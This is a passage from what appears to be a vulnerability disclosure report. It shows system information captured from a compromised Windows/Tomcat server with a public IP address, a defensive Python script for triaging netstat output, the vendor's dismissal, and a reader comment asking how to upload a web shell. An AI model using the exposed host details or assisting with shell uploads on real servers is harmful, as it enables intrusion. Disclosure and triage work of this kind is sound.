[165]: KB2770660 - Update
[166]: KB2780091 - Update
[167]: KB2803821-v2 - Update
[168]: KB2807986 - Update
[169]: KB2820917 - Update
[170]: KB2834886 - Update
[171]: KB2847311 - Update
[172]: KB2859537 - Update
[173]: KB2862152 - Update
[174]: KB2862335 - Update
[175]: KB2864063 - Update
[176]: KB2868626 - Update
[177]: KB2876217 - Update
[178]: KB2876331 - Update
[179]: KB2892076 - Update
[180]: KB2893294 - Update
[181]: KB2898715 - Update
[182]: KB2900986 - Update
[183]: KB2901115 - Update
[184]: KB2909213 - Update
[185]: KB2914368 - Update
[186]: KB2926765 - Update
[187]: KB2929961 - Update
[188]: KB2930275 - Update
[189]: KB2939576 - Update
[190]: KB2957503 - Update
[191]: KB2957509 - Update
[192]: KB2957689 - Update
[193]: KB2961072 - Update
[194]: KB2962872 - Update
[195]: KB923561 - Update
[196]: KB927891 - Update
[197]: KB929123 - Update
[198]: KB942831 - Update
[199]: KB944653 - Update
[200]: KB946026 - Update
[201]: KB948496 - Update
[202]: KB950224-v3 - Update
[203]: KB950762 - Update
[204]: KB950974 - Update
[205]: KB952004 - Update
[206]: KB952954 - Update
[207]: KB954155 - Update
[208]: KB956844 - Update
[209]: KB959426 - Update
[210]: KB960803 - Update
[211]: KB960859 - Update
[212]: KB967715 - Update
[213]: KB969059 - Update
[214]: KB971029 - Update
[215]: KB971032 - Update
[216]: KB971657 - Update
[217]
网卡: 安装了 2 个 NIC。
[01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
连接名: 本地连接 2
状态: 媒体连接已中断
[02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 61.145.119.248
D:\Tomcat7\>
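
As an added example (not part of the report), the Python below parses `netstat -ano` output in the format shown above and flags what a responder would check first: sensitive services bound to all interfaces, and peers outside the host's own /24 reaching them, counted per (remote IP, local port) so a burst against one port, like the 1433 rows in the dump, stands out. The port list and the 61.145.119.0/24 network are assumptions of the example, and the sample rows are constructed from the report's output.

```python
"""Triage a Windows `netstat -ano` dump such as the POC above (added example, not
part of the report): flag sensitive services bound to 0.0.0.0 and count peers
outside the server's own subnet per (remote IP, local port), so a burst of
connections to one port, like the 1433 rows in the dump, stands out."""
import ipaddress
from collections import Counter
from typing import Dict, List, NamedTuple, Tuple
# Services that should not face the internet directly on a web host.
# This list is an assumption of the example; the report defines no such list.
SENSITIVE_PORTS: Dict[int, str] = {135: "MSRPC", 445: "SMB", 1433: "MSSQL",
                                   3306: "MySQL", 5631: "pcAnywhere"}

class Conn(NamedTuple):
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int  # -1 for the "*:*" foreign column of UDP rows
    state: str        # "" for UDP rows, which have no state column
    pid: int

def _endpoint(ep: str) -> Tuple[str, int]:
    host, _, port = ep.rpartition(":")
    return host, (int(port) if port.isdigit() else -1)

def parse_netstat(text: str) -> List[Conn]:
    """Keep TCP/UDP rows only; header, prompt and blank lines are skipped."""
    conns: List[Conn] = []
    for raw in text.splitlines():
        p = raw.split()
        if not p or p[0] not in ("TCP", "UDP"):
            continue
        lip, lport = _endpoint(p[1])
        rip, rport = _endpoint(p[2])
        state, pid = (p[3], int(p[4])) if p[0] == "TCP" else ("", int(p[3]))
        conns.append(Conn(p[0], lip, lport, rip, rport, state, pid))
    return conns

def exposed_listeners(conns: List[Conn]) -> List[Tuple[int, str, int]]:
    """(port, service, pid) for sensitive ports bound to every interface."""
    return sorted({(c.local_port, SENSITIVE_PORTS[c.local_port], c.pid)
                   for c in conns
                   if c.local_ip == "0.0.0.0" and c.local_port in SENSITIVE_PORTS
                   and (c.proto == "UDP" or c.state == "LISTENING")})

def foreign_clients(conns: List[Conn], local_net: str) -> Counter:
    """Connections from outside local_net to sensitive ports, keyed by
    (remote_ip, local_port). TIME_WAIT rows count: each is a finished session."""
    net = ipaddress.ip_network(local_net)
    counts: Counter = Counter()
    for c in conns:
        if (c.proto == "TCP" and c.state != "LISTENING"
                and c.local_port in SENSITIVE_PORTS
                and ipaddress.ip_address(c.remote_ip) not in net):
            counts[(c.remote_ip, c.local_port)] += 1
    return counts

# Constructed excerpt of the report's `netstat -ano` output (host is 61.145.119.248/24).
SAMPLE = """\
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 195828
TCP 61.145.119.248:135 107.160.16.164:2887 ESTABLISHED 712
TCP 61.145.119.248:1433 61.145.119.84:1030 ESTABLISHED 195828
TCP 61.145.119.248:1433 104.149.23.12:5060 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5114 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:8169 FIN_WAIT_1 195828
UDP 0.0.0.0:445 *:* 4
D:\\Tomcat7\\>
"""

if __name__ == "__main__":
    conns = parse_netstat(SAMPLE)
    for port, svc, pid in exposed_listeners(conns):
        print(f"listening on all interfaces: {svc}/{port} (pid {pid})")
    for (ip, port), n in foreign_clients(conns, "61.145.119.0/24").most_common():
        print(f"foreign peer {ip} -> {SENSITIVE_PORTS[port]}/{port}: {n} connection(s)")
```

The same-subnet client 61.145.119.84 is left out of the foreign count, which separates the application's own database traffic from the external hosts reaching 1433 and 135 directly.
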

Fix recommendation

Raise security awareness.

Status history
2015-11-06: details sent to the vendor, awaiting vendor handling
2015-11-09: the vendor actively ignored the vulnerability; details disclosed to the public
Vendor response
Response: severity: no impact; vendor ignored; ignored at: 2015-11-09 17:21
Comments (content / commenter / likes / time)

Looking for a tutorial on uploading a shell: why does my shell upload fail, while uploading a short txt works?

kazaf0 2015-11-09 22:12:00